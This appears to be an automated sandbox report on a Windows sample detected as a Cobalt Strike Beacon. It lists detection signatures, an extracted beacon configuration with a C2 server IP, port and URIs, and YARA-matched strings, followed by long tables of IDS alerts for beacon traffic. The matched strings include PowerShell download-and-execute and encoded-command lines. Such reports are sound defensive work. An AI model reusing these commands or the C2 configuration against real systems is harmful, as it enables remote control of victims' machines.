Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
P3KxDOMmD3.exe

Overview

General Information

Sample name:P3KxDOMmD3.exe
renamed because original name is a hash value
Original sample name:b079e06ca60cf07b35abd19e225d3e1c.exe
Analysis ID:1528400
MD5:b079e06ca60cf07b35abd19e225d3e1c
SHA1:9f707057f162e7b6b6a51fd0b8ad1f155ae6438b
SHA256:a430979a8135771d0a0ffce9ef6755052ae788dec08e9a095d5e63f9b6f387f6
Tags:64exe
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • P3KxDOMmD3.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\P3KxDOMmD3.exe" MD5: B079E06CA60CF07B35ABD19E225D3E1C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTP"], "Port": 7810, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "89.197.154.116,/cm", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
SourceRuleDescriptionAuthorStrings
00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
    00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
      • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
      • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
      • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
      • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
      • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
      • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
      • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
      • 0x32d6a:$a11: Could not open service control manager on %s: %d
      • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
      • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
      • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
      • 0x33255:$a15: could not create remote thread in %d: %d
      • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
      • 0x33203:$a17: could not write to process memory: %d
      • 0x32d9b:$a18: Could not create service %s on %s: %d
      • 0x32e24:$a19: Could not delete service %s on %s: %d
      • 0x32c89:$a20: Could not open process token: %d (%u)
      00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
      • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
      00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
      • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
      • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
      Click to see the 28 entries
      SourceRuleDescriptionAuthorStrings
      0.2.P3KxDOMmD3.exe.1a0000.0.unpackJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
        0.2.P3KxDOMmD3.exe.1a0000.0.unpackJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
          0.2.P3KxDOMmD3.exe.1a0000.0.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
            0.2.P3KxDOMmD3.exe.1a0000.0.unpackWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
            • 0x303a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x3041b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x3047e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x304c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x30502:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
            • 0x30538:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x30160:$a39: %s as %s\%s: %d
            • 0x30394:$a40: %s.1%x.%x%x.%s
            • 0x3e7e2:$a41: beacon.x64.dll
            • 0x30387:$a43: www6.%x%x.%s
            • 0x3037b:$a44: cdn.%x%x.%s
            • 0x30360:$a47: beacon.dll
            • 0x302d8:$a48: %s%s: %s
            • 0x3018c:$a50: %02d/%02d/%02d %02d:%02d:%02d
            • 0x301b8:$a50: %02d/%02d/%02d %02d:%02d:%02d
            0.2.P3KxDOMmD3.exe.1a0000.0.unpackWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
            • 0x1c13c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
            Click to see the 40 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T22:00:04.887327+020020337131Targeted Malicious Activity was Detected192.168.2.44973089.197.154.1167810TCP
            2024-10-07T22:00:06.825937+020020337131Targeted Malicious Activity was Detected192.168.2.44973189.197.154.1167810TCP
            2024-10-07T22:00:08.534715+020020337131Targeted Malicious Activity was Detected192.168.2.44973289.197.154.1167810TCP
            2024-10-07T22:00:10.264513+020020337131Targeted Malicious Activity was Detected192.168.2.44973389.197.154.1167810TCP
            2024-10-07T22:00:12.028170+020020337131Targeted Malicious Activity was Detected192.168.2.44973489.197.154.1167810TCP
            2024-10-07T22:00:13.851716+020020337131Targeted Malicious Activity was Detected192.168.2.44973589.197.154.1167810TCP
            2024-10-07T22:00:15.567674+020020337131Targeted Malicious Activity was Detected192.168.2.44973689.197.154.1167810TCP
            2024-10-07T22:00:17.303031+020020337131Targeted Malicious Activity was Detected192.168.2.44973789.197.154.1167810TCP
            2024-10-07T22:00:19.019522+020020337131Targeted Malicious Activity was Detected192.168.2.44973889.197.154.1167810TCP
            2024-10-07T22:00:20.715916+020020337131Targeted Malicious Activity was Detected192.168.2.44974189.197.154.1167810TCP
            2024-10-07T22:00:22.559096+020020337131Targeted Malicious Activity was Detected192.168.2.44974589.197.154.1167810TCP
            2024-10-07T22:00:24.295931+020020337131Targeted Malicious Activity was Detected192.168.2.44974789.197.154.1167810TCP
            2024-10-07T22:00:26.003982+020020337131Targeted Malicious Activity was Detected192.168.2.44974889.197.154.1167810TCP
            2024-10-07T22:00:27.767095+020020337131Targeted Malicious Activity was Detected192.168.2.44974989.197.154.1167810TCP
            2024-10-07T22:00:29.450557+020020337131Targeted Malicious Activity was Detected192.168.2.44975089.197.154.1167810TCP
            2024-10-07T22:00:33.574658+020020337131Targeted Malicious Activity was Detected192.168.2.44975189.197.154.1167810TCP
            2024-10-07T22:00:35.545658+020020337131Targeted Malicious Activity was Detected192.168.2.44975289.197.154.1167810TCP
            2024-10-07T22:00:37.247360+020020337131Targeted Malicious Activity was Detected192.168.2.44975389.197.154.1167810TCP
            2024-10-07T22:00:38.969491+020020337131Targeted Malicious Activity was Detected192.168.2.44975489.197.154.1167810TCP
            2024-10-07T22:00:40.675331+020020337131Targeted Malicious Activity was Detected192.168.2.44975589.197.154.1167810TCP
            2024-10-07T22:00:42.358293+020020337131Targeted Malicious Activity was Detected192.168.2.44975689.197.154.1167810TCP
            2024-10-07T22:00:44.092723+020020337131Targeted Malicious Activity was Detected192.168.2.44975789.197.154.1167810TCP
            2024-10-07T22:00:45.812862+020020337131Targeted Malicious Activity was Detected192.168.2.44975889.197.154.1167810TCP
            2024-10-07T22:00:47.535783+020020337131Targeted Malicious Activity was Detected192.168.2.44975989.197.154.1167810TCP
            2024-10-07T22:00:49.272785+020020337131Targeted Malicious Activity was Detected192.168.2.44976089.197.154.1167810TCP
            2024-10-07T22:00:50.988910+020020337131Targeted Malicious Activity was Detected192.168.2.44976189.197.154.1167810TCP
            2024-10-07T22:00:52.881734+020020337131Targeted Malicious Activity was Detected192.168.2.44976289.197.154.1167810TCP
            2024-10-07T22:00:54.576802+020020337131Targeted Malicious Activity was Detected192.168.2.44976389.197.154.1167810TCP
            2024-10-07T22:00:56.263309+020020337131Targeted Malicious Activity was Detected192.168.2.44976489.197.154.1167810TCP
            2024-10-07T22:00:57.971739+020020337131Targeted Malicious Activity was Detected192.168.2.44976589.197.154.1167810TCP
            2024-10-07T22:00:59.680335+020020337131Targeted Malicious Activity was Detected192.168.2.44976789.197.154.1167810TCP
            2024-10-07T22:01:01.395075+020020337131Targeted Malicious Activity was Detected192.168.2.44976989.197.154.1167810TCP
            2024-10-07T22:01:03.285490+020020337131Targeted Malicious Activity was Detected192.168.2.44978089.197.154.1167810TCP
            2024-10-07T22:01:04.987483+020020337131Targeted Malicious Activity was Detected192.168.2.44979189.197.154.1167810TCP
            2024-10-07T22:01:06.689132+020020337131Targeted Malicious Activity was Detected192.168.2.44980789.197.154.1167810TCP
            2024-10-07T22:01:08.658738+020020337131Targeted Malicious Activity was Detected192.168.2.44981889.197.154.1167810TCP
            2024-10-07T22:01:10.359503+020020337131Targeted Malicious Activity was Detected192.168.2.44982589.197.154.1167810TCP
            2024-10-07T22:01:12.084607+020020337131Targeted Malicious Activity was Detected192.168.2.44984089.197.154.1167810TCP
            2024-10-07T22:01:13.796875+020020337131Targeted Malicious Activity was Detected192.168.2.44985189.197.154.1167810TCP
            2024-10-07T22:01:15.534739+020020337131Targeted Malicious Activity was Detected192.168.2.44985789.197.154.1167810TCP
            2024-10-07T22:01:17.252714+020020337131Targeted Malicious Activity was Detected192.168.2.44986889.197.154.1167810TCP
            2024-10-07T22:01:18.941423+020020337131Targeted Malicious Activity was Detected192.168.2.44987989.197.154.1167810TCP
            2024-10-07T22:01:20.873023+020020337131Targeted Malicious Activity was Detected192.168.2.44989489.197.154.1167810TCP
            2024-10-07T22:01:22.591355+020020337131Targeted Malicious Activity was Detected192.168.2.44990689.197.154.1167810TCP
            2024-10-07T22:01:24.295453+020020337131Targeted Malicious Activity was Detected192.168.2.44991889.197.154.1167810TCP
            2024-10-07T22:01:25.987531+020020337131Targeted Malicious Activity was Detected192.168.2.44993189.197.154.1167810TCP
            2024-10-07T22:01:30.231283+020020337131Targeted Malicious Activity was Detected192.168.2.44993989.197.154.1167810TCP
            2024-10-07T22:01:31.987185+020020337131Targeted Malicious Activity was Detected192.168.2.44996489.197.154.1167810TCP
            2024-10-07T22:01:33.703695+020020337131Targeted Malicious Activity was Detected192.168.2.44997489.197.154.1167810TCP
            2024-10-07T22:01:35.440140+020020337131Targeted Malicious Activity was Detected192.168.2.44998589.197.154.1167810TCP
            2024-10-07T22:01:37.248186+020020337131Targeted Malicious Activity was Detected192.168.2.44999989.197.154.1167810TCP
            2024-10-07T22:01:38.959548+020020337131Targeted Malicious Activity was Detected192.168.2.45001089.197.154.1167810TCP
            2024-10-07T22:01:40.674934+020020337131Targeted Malicious Activity was Detected192.168.2.45002289.197.154.1167810TCP
            2024-10-07T22:01:42.555618+020020337131Targeted Malicious Activity was Detected192.168.2.45003189.197.154.1167810TCP
            2024-10-07T22:01:44.253610+020020337131Targeted Malicious Activity was Detected192.168.2.45003689.197.154.1167810TCP
            2024-10-07T22:01:45.937035+020020337131Targeted Malicious Activity was Detected192.168.2.45004789.197.154.1167810TCP
            2024-10-07T22:01:47.705942+020020337131Targeted Malicious Activity was Detected192.168.2.45005689.197.154.1167810TCP
            2024-10-07T22:01:49.411092+020020337131Targeted Malicious Activity was Detected192.168.2.45006189.197.154.1167810TCP
            2024-10-07T22:01:51.121962+020020337131Targeted Malicious Activity was Detected192.168.2.45006289.197.154.1167810TCP
            2024-10-07T22:01:52.812386+020020337131Targeted Malicious Activity was Detected192.168.2.45006389.197.154.1167810TCP
            2024-10-07T22:01:54.523649+020020337131Targeted Malicious Activity was Detected192.168.2.45006489.197.154.1167810TCP
            2024-10-07T22:01:56.234251+020020337131Targeted Malicious Activity was Detected192.168.2.45006589.197.154.1167810TCP
            2024-10-07T22:01:57.943671+020020337131Targeted Malicious Activity was Detected192.168.2.45006689.197.154.1167810TCP
            2024-10-07T22:01:59.659436+020020337131Targeted Malicious Activity was Detected192.168.2.45006789.197.154.1167810TCP
            2024-10-07T22:02:00.965734+020020337131Targeted Malicious Activity was Detected192.168.2.45006889.197.154.1167810TCP
            2024-10-07T22:02:02.745780+020020337131Targeted Malicious Activity was Detected192.168.2.45006989.197.154.1167810TCP
            2024-10-07T22:02:04.531226+020020337131Targeted Malicious Activity was Detected192.168.2.45007089.197.154.1167810TCP
            2024-10-07T22:02:06.279916+020020337131Targeted Malicious Activity was Detected192.168.2.45007189.197.154.1167810TCP
            2024-10-07T22:02:07.987670+020020337131Targeted Malicious Activity was Detected192.168.2.45007289.197.154.1167810TCP
            2024-10-07T22:02:09.688424+020020337131Targeted Malicious Activity was Detected192.168.2.45007389.197.154.1167810TCP
            2024-10-07T22:02:11.375813+020020337131Targeted Malicious Activity was Detected192.168.2.45007489.197.154.1167810TCP
            2024-10-07T22:02:13.110536+020020337131Targeted Malicious Activity was Detected192.168.2.45007589.197.154.1167810TCP
            2024-10-07T22:02:14.797259+020020337131Targeted Malicious Activity was Detected192.168.2.45007689.197.154.1167810TCP
            2024-10-07T22:02:18.921867+020020337131Targeted Malicious Activity was Detected192.168.2.45007789.197.154.1167810TCP
            2024-10-07T22:02:20.671891+020020337131Targeted Malicious Activity was Detected192.168.2.45007889.197.154.1167810TCP
            2024-10-07T22:02:22.359658+020020337131Targeted Malicious Activity was Detected192.168.2.45007989.197.154.1167810TCP
            2024-10-07T22:02:24.047079+020020337131Targeted Malicious Activity was Detected192.168.2.45008089.197.154.1167810TCP
            2024-10-07T22:02:25.775690+020020337131Targeted Malicious Activity was Detected192.168.2.45008189.197.154.1167810TCP
            2024-10-07T22:02:27.509125+020020337131Targeted Malicious Activity was Detected192.168.2.45008289.197.154.1167810TCP
            2024-10-07T22:02:29.296493+020020337131Targeted Malicious Activity was Detected192.168.2.45008389.197.154.1167810TCP
            2024-10-07T22:02:30.987183+020020337131Targeted Malicious Activity was Detected192.168.2.45008489.197.154.1167810TCP
            2024-10-07T22:02:32.843335+020020337131Targeted Malicious Activity was Detected192.168.2.45008589.197.154.1167810TCP
            2024-10-07T22:02:34.579818+020020337131Targeted Malicious Activity was Detected192.168.2.45008689.197.154.1167810TCP
            2024-10-07T22:02:36.284525+020020337131Targeted Malicious Activity was Detected192.168.2.45008789.197.154.1167810TCP
            2024-10-07T22:02:37.991762+020020337131Targeted Malicious Activity was Detected192.168.2.45008889.197.154.1167810TCP
            2024-10-07T22:02:39.922933+020020337131Targeted Malicious Activity was Detected192.168.2.45008989.197.154.1167810TCP
            2024-10-07T22:02:41.609244+020020337131Targeted Malicious Activity was Detected192.168.2.45009089.197.154.1167810TCP
            2024-10-07T22:02:43.394927+020020337131Targeted Malicious Activity was Detected192.168.2.45009189.197.154.1167810TCP
            2024-10-07T22:02:45.110616+020020337131Targeted Malicious Activity was Detected192.168.2.45009289.197.154.1167810TCP
            2024-10-07T22:02:46.838712+020020337131Targeted Malicious Activity was Detected192.168.2.45009389.197.154.1167810TCP
            2024-10-07T22:02:48.670293+020020337131Targeted Malicious Activity was Detected192.168.2.45009489.197.154.1167810TCP
            2024-10-07T22:02:50.382420+020020337131Targeted Malicious Activity was Detected192.168.2.45009589.197.154.1167810TCP
            2024-10-07T22:02:52.127731+020020337131Targeted Malicious Activity was Detected192.168.2.45009689.197.154.1167810TCP
            2024-10-07T22:02:53.847880+020020337131Targeted Malicious Activity was Detected192.168.2.45009789.197.154.1167810TCP
            2024-10-07T22:02:55.531342+020020337131Targeted Malicious Activity was Detected192.168.2.45009889.197.154.1167810TCP
            2024-10-07T22:02:57.239729+020020337131Targeted Malicious Activity was Detected192.168.2.45009989.197.154.1167810TCP
            2024-10-07T22:02:59.271603+020020337131Targeted Malicious Activity was Detected192.168.2.45010089.197.154.1167810TCP
            2024-10-07T22:03:01.004317+020020337131Targeted Malicious Activity was Detected192.168.2.45010189.197.154.1167810TCP
            2024-10-07T22:03:03.244781+020020337131Targeted Malicious Activity was Detected192.168.2.45010289.197.154.1167810TCP
            2024-10-07T22:03:04.960032+020020337131Targeted Malicious Activity was Detected192.168.2.45010389.197.154.1167810TCP
            2024-10-07T22:03:06.689840+020020337131Targeted Malicious Activity was Detected192.168.2.45010489.197.154.1167810TCP
            2024-10-07T22:03:08.399776+020020337131Targeted Malicious Activity was Detected192.168.2.45010589.197.154.1167810TCP
            2024-10-07T22:03:11.048493+020020337131Targeted Malicious Activity was Detected192.168.2.45010689.197.154.1167810TCP
            2024-10-07T22:03:12.779771+020020337131Targeted Malicious Activity was Detected192.168.2.45010789.197.154.1167810TCP
            2024-10-07T22:03:14.471824+020020337131Targeted Malicious Activity was Detected192.168.2.45010889.197.154.1167810TCP
            2024-10-07T22:03:16.195755+020020337131Targeted Malicious Activity was Detected192.168.2.45010989.197.154.1167810TCP
            2024-10-07T22:03:20.324957+020020337131Targeted Malicious Activity was Detected192.168.2.45011089.197.154.1167810TCP
            2024-10-07T22:03:22.036589+020020337131Targeted Malicious Activity was Detected192.168.2.45011189.197.154.1167810TCP
            2024-10-07T22:03:23.736122+020020337131Targeted Malicious Activity was Detected192.168.2.45011289.197.154.1167810TCP
            2024-10-07T22:03:25.438851+020020337131Targeted Malicious Activity was Detected192.168.2.45011389.197.154.1167810TCP
            2024-10-07T22:03:27.125403+020020337131Targeted Malicious Activity was Detected192.168.2.45011489.197.154.1167810TCP
            2024-10-07T22:03:31.246894+020020337131Targeted Malicious Activity was Detected192.168.2.45011589.197.154.1167810TCP
            2024-10-07T22:03:32.940347+020020337131Targeted Malicious Activity was Detected192.168.2.45011689.197.154.1167810TCP
            2024-10-07T22:03:34.924692+020020337131Targeted Malicious Activity was Detected192.168.2.45011789.197.154.1167810TCP
            2024-10-07T22:03:36.647798+020020337131Targeted Malicious Activity was Detected192.168.2.45011889.197.154.1167810TCP
            2024-10-07T22:03:38.367772+020020337131Targeted Malicious Activity was Detected192.168.2.45011989.197.154.1167810TCP
            2024-10-07T22:03:40.067334+020020337131Targeted Malicious Activity was Detected192.168.2.45012089.197.154.1167810TCP
            2024-10-07T22:03:41.793351+020020337131Targeted Malicious Activity was Detected192.168.2.45012189.197.154.1167810TCP
            2024-10-07T22:03:43.493833+020020337131Targeted Malicious Activity was Detected192.168.2.45012289.197.154.1167810TCP
            2024-10-07T22:03:45.472141+020020337131Targeted Malicious Activity was Detected192.168.2.45012389.197.154.1167810TCP
            2024-10-07T22:03:47.489094+020020337131Targeted Malicious Activity was Detected192.168.2.45012489.197.154.1167810TCP
            2024-10-07T22:03:49.298704+020020337131Targeted Malicious Activity was Detected192.168.2.45012589.197.154.1167810TCP
            2024-10-07T22:03:51.006116+020020337131Targeted Malicious Activity was Detected192.168.2.45012689.197.154.1167810TCP
            2024-10-07T22:03:52.816640+020020337131Targeted Malicious Activity was Detected192.168.2.45012789.197.154.1167810TCP
            2024-10-07T22:03:54.507410+020020337131Targeted Malicious Activity was Detected192.168.2.45012889.197.154.1167810TCP
            2024-10-07T22:03:56.419858+020020337131Targeted Malicious Activity was Detected192.168.2.45012989.197.154.1167810TCP
            2024-10-07T22:03:58.135993+020020337131Targeted Malicious Activity was Detected192.168.2.45013089.197.154.1167810TCP
            2024-10-07T22:03:59.879302+020020337131Targeted Malicious Activity was Detected192.168.2.45013189.197.154.1167810TCP
            2024-10-07T22:04:01.843457+020020337131Targeted Malicious Activity was Detected192.168.2.45013289.197.154.1167810TCP
            2024-10-07T22:04:03.584335+020020337131Targeted Malicious Activity was Detected192.168.2.45013389.197.154.1167810TCP
            2024-10-07T22:04:07.715970+020020337131Targeted Malicious Activity was Detected192.168.2.45013489.197.154.1167810TCP
            2024-10-07T22:04:10.473796+020020337131Targeted Malicious Activity was Detected192.168.2.45013589.197.154.1167810TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-07T22:00:04.887327+020020366771A Network Trojan was detected192.168.2.44973089.197.154.1167810TCP
            2024-10-07T22:00:06.825937+020020366771A Network Trojan was detected192.168.2.44973189.197.154.1167810TCP
            2024-10-07T22:00:08.534715+020020366771A Network Trojan was detected192.168.2.44973289.197.154.1167810TCP
            2024-10-07T22:00:10.264513+020020366771A Network Trojan was detected192.168.2.44973389.197.154.1167810TCP
            2024-10-07T22:00:12.028170+020020366771A Network Trojan was detected192.168.2.44973489.197.154.1167810TCP
            2024-10-07T22:00:13.851716+020020366771A Network Trojan was detected192.168.2.44973589.197.154.1167810TCP
            2024-10-07T22:00:15.567674+020020366771A Network Trojan was detected192.168.2.44973689.197.154.1167810TCP
            2024-10-07T22:00:17.303031+020020366771A Network Trojan was detected192.168.2.44973789.197.154.1167810TCP
            2024-10-07T22:00:19.019522+020020366771A Network Trojan was detected192.168.2.44973889.197.154.1167810TCP
            2024-10-07T22:00:20.715916+020020366771A Network Trojan was detected192.168.2.44974189.197.154.1167810TCP
            2024-10-07T22:00:22.559096+020020366771A Network Trojan was detected192.168.2.44974589.197.154.1167810TCP
            2024-10-07T22:00:24.295931+020020366771A Network Trojan was detected192.168.2.44974789.197.154.1167810TCP
            2024-10-07T22:00:26.003982+020020366771A Network Trojan was detected192.168.2.44974889.197.154.1167810TCP
            2024-10-07T22:00:27.767095+020020366771A Network Trojan was detected192.168.2.44974989.197.154.1167810TCP
            2024-10-07T22:00:29.450557+020020366771A Network Trojan was detected192.168.2.44975089.197.154.1167810TCP
            2024-10-07T22:00:33.574658+020020366771A Network Trojan was detected192.168.2.44975189.197.154.1167810TCP
            2024-10-07T22:00:35.545658+020020366771A Network Trojan was detected192.168.2.44975289.197.154.1167810TCP
            2024-10-07T22:00:37.247360+020020366771A Network Trojan was detected192.168.2.44975389.197.154.1167810TCP
            2024-10-07T22:00:38.969491+020020366771A Network Trojan was detected192.168.2.44975489.197.154.1167810TCP
            2024-10-07T22:00:40.675331+020020366771A Network Trojan was detected192.168.2.44975589.197.154.1167810TCP
            2024-10-07T22:00:42.358293+020020366771A Network Trojan was detected192.168.2.44975689.197.154.1167810TCP
            2024-10-07T22:00:44.092723+020020366771A Network Trojan was detected192.168.2.44975789.197.154.1167810TCP
            2024-10-07T22:00:45.812862+020020366771A Network Trojan was detected192.168.2.44975889.197.154.1167810TCP
            2024-10-07T22:00:47.535783+020020366771A Network Trojan was detected192.168.2.44975989.197.154.1167810TCP
            2024-10-07T22:00:49.272785+020020366771A Network Trojan was detected192.168.2.44976089.197.154.1167810TCP
            2024-10-07T22:00:50.988910+020020366771A Network Trojan was detected192.168.2.44976189.197.154.1167810TCP
            2024-10-07T22:00:52.881734+020020366771A Network Trojan was detected192.168.2.44976289.197.154.1167810TCP
            2024-10-07T22:00:54.576802+020020366771A Network Trojan was detected192.168.2.44976389.197.154.1167810TCP
            2024-10-07T22:00:56.263309+020020366771A Network Trojan was detected192.168.2.44976489.197.154.1167810TCP
            2024-10-07T22:00:57.971739+020020366771A Network Trojan was detected192.168.2.44976589.197.154.1167810TCP
            2024-10-07T22:00:59.680335+020020366771A Network Trojan was detected192.168.2.44976789.197.154.1167810TCP
            2024-10-07T22:01:01.395075+020020366771A Network Trojan was detected192.168.2.44976989.197.154.1167810TCP
            2024-10-07T22:01:03.285490+020020366771A Network Trojan was detected192.168.2.44978089.197.154.1167810TCP
            2024-10-07T22:01:04.987483+020020366771A Network Trojan was detected192.168.2.44979189.197.154.1167810TCP
            2024-10-07T22:01:06.689132+020020366771A Network Trojan was detected192.168.2.44980789.197.154.1167810TCP
            2024-10-07T22:01:08.658738+020020366771A Network Trojan was detected192.168.2.44981889.197.154.1167810TCP
            2024-10-07T22:01:10.359503+020020366771A Network Trojan was detected192.168.2.44982589.197.154.1167810TCP
            2024-10-07T22:01:12.084607+020020366771A Network Trojan was detected192.168.2.44984089.197.154.1167810TCP
            2024-10-07T22:01:13.796875+020020366771A Network Trojan was detected192.168.2.44985189.197.154.1167810TCP
            2024-10-07T22:01:15.534739+020020366771A Network Trojan was detected192.168.2.44985789.197.154.1167810TCP
            2024-10-07T22:01:17.252714+020020366771A Network Trojan was detected192.168.2.44986889.197.154.1167810TCP
            2024-10-07T22:01:18.941423+020020366771A Network Trojan was detected192.168.2.44987989.197.154.1167810TCP
            2024-10-07T22:01:20.873023+020020366771A Network Trojan was detected192.168.2.44989489.197.154.1167810TCP
            2024-10-07T22:01:22.591355+020020366771A Network Trojan was detected192.168.2.44990689.197.154.1167810TCP
            2024-10-07T22:01:24.295453+020020366771A Network Trojan was detected192.168.2.44991889.197.154.1167810TCP
